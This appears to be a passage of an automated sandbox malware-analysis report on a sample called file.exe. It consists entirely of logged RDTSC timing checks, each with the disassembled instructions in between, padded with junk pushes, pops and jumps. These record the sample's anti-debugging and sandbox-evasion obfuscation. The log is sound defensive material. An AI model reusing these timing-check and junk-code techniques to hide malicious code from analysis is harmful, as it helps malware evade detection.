Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60336E second address: 603379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603379 second address: 60337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6038E1 second address: 6038EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6038EA second address: 6038FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6038FB second address: 60391A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A543h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b js 00007FBE44D3A536h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6093BF second address: 6093D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607F5C second address: 607F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607F60 second address: 607F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607F6A second address: 607F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607F70 second address: 607F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607F79 second address: 607FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A542h 0x00000009 jmp 00007FBE44D3A549h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FBE44D3A549h 0x00000015 jng 00007FBE44D3A536h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608238 second address: 608262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FBE444F40A6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FBE444F40B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608262 second address: 608266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60890F second address: 60891D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FBE444F40A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608A7C second address: 608A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44D3A53Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608A8C second address: 608AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608AA4 second address: 608AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608AA8 second address: 608AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608D9D second address: 608DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBE44D3A536h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007FBE44D3A53Bh 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608DBE second address: 608DDF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FBE444F40B3h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 608DDF second address: 608E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44D3A546h 0x00000008 jno 00007FBE44D3A536h 0x0000000e jmp 00007FBE44D3A544h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7879 second address: 5B7886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FBE444F40ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7886 second address: 5B788E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B788E second address: 5B7894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607A46 second address: 607A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D3A542h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBE44D3A541h 0x00000010 popad 0x00000011 jnc 00007FBE44D3A53Ch 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607A7F second address: 607A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBE444F40A6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607A8E second address: 607A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 607A94 second address: 607A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60CC60 second address: 60CC84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE44D3A538h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBE44D3A545h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60CC84 second address: 60CC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D19D7 second address: 5D1A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBE44D3A536h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007FBE44D3A546h 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1A02 second address: 5D1A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBE444F40A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1A0C second address: 5D1A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A53Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ch, 72h 0x0000000e lea eax, dword ptr [ebp+12483790h] 0x00000014 jmp 00007FBE44D3A543h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBE44D3A542h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1A52 second address: 5B6D0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE444F40ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBE444F40A8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D29B3h], ecx 0x0000002d call dword ptr [ebp+122D34B6h] 0x00000033 pushad 0x00000034 jbe 00007FBE444F40B2h 0x0000003a jno 00007FBE444F40A6h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1B2A second address: 5D1B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1C5D second address: 5D1C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBE444F40B1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1C74 second address: 5D1C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jo 00007FBE44D3A536h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1C86 second address: 5D1C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D209E second address: 5D20A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D20A3 second address: 5D20DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e jmp 00007FBE444F40B8h 0x00000013 pop edi 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 ja 00007FBE444F40A8h 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D21AE second address: 5D21B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBE44D3A53Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D2256 second address: 5D225A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D225A second address: 5D227F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBE44D3A538h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push esi 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pop esi 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 mov dword ptr [ebp+122D3393h], eax 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D227F second address: 5D2283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D2520 second address: 5D252B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FBE44D3A536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D28F1 second address: 5D28F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D28F5 second address: 5D2937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d xor dword ptr [ebp+122D27C2h], ecx 0x00000013 jmp 00007FBE44D3A53Eh 0x00000018 popad 0x00000019 push 0000001Eh 0x0000001b mov dword ptr [ebp+1245CDC7h], ebx 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 js 00007FBE44D3A536h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2BB3 second address: 5D2BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2BB7 second address: 5D2BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C44 second address: 5D2CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FBE444F40ACh 0x0000000d jnc 00007FBE444F40A6h 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 jnc 00007FBE444F40B2h 0x0000001d lea eax, dword ptr [ebp+124837D4h] 0x00000023 push esi 0x00000024 mov dword ptr [ebp+122D27DDh], eax 0x0000002a pop edx 0x0000002b nop 0x0000002c jmp 00007FBE444F40AFh 0x00000031 push eax 0x00000032 jmp 00007FBE444F40B1h 0x00000037 nop 0x00000038 mov ecx, dword ptr [ebp+122D2E04h] 0x0000003e lea eax, dword ptr [ebp+12483790h] 0x00000044 mov di, si 0x00000047 nop 0x00000048 jmp 00007FBE444F40B5h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push edx 0x00000051 push eax 0x00000052 pop eax 0x00000053 pop edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2CCA second address: 5B7879 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push edx 0x0000000a jns 00007FBE44D3A53Bh 0x00000010 pop ecx 0x00000011 call dword ptr [ebp+122D24DEh] 0x00000017 pushad 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D25B second address: 60D260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D260 second address: 60D266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D3B8 second address: 60D3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D3BE second address: 60D3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE44D3A542h 0x0000000a jmp 00007FBE44D3A540h 0x0000000f pushad 0x00000010 jns 00007FBE44D3A536h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D570 second address: 60D588 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE444F40A6h 0x00000008 jmp 00007FBE444F40AEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F4B second address: 599F5B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE44D3A53Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F5B second address: 599F89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBE444F40AEh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F89 second address: 599F95 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44D3A536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F95 second address: 599F9A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6179AC second address: 6179B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6179B2 second address: 6179E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007FBE444F40C9h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6179E0 second address: 6179E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617C7E second address: 617C8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617DFE second address: 617E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617E02 second address: 617E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FBE444F40A6h 0x00000013 jmp 00007FBE444F40ACh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617E2C second address: 617E32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A093 second address: 61A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A09B second address: 61A0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0AB second address: 61A0B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBE444F40A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0B9 second address: 61A0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0BD second address: 61A0C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A0C3 second address: 61A0C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62460E second address: 624667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBE444F40ABh 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FBE444F40AFh 0x00000015 jmp 00007FBE444F40B7h 0x0000001a popad 0x0000001b jmp 00007FBE444F40ADh 0x00000020 pushad 0x00000021 jmp 00007FBE444F40AAh 0x00000026 push eax 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6247DA second address: 6247E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62496A second address: 624996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40B9h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FBE444F40A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624996 second address: 6249C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBE44D3A53Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FBE44D3A549h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6249C7 second address: 6249CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6249CD second address: 6249D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DA8 second address: 624DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DAC second address: 624DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DB7 second address: 624DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DBD second address: 624DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DC3 second address: 624DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624DCA second address: 624DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBE44D3A536h 0x0000000a jbe 00007FBE44D3A536h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2744 second address: 5D274A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D274A second address: 5D27BD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FBE44D3A53Ah 0x00000013 js 00007FBE44D3A53Ch 0x00000019 popad 0x0000001a nop 0x0000001b jmp 00007FBE44D3A547h 0x00000020 mov ebx, dword ptr [ebp+124837CFh] 0x00000026 mov dword ptr [ebp+122D3CAAh], ebx 0x0000002c sub cl, FFFFFFD4h 0x0000002f add eax, ebx 0x00000031 ja 00007FBE44D3A539h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FBE44D3A547h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D27BD second address: 5D27D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
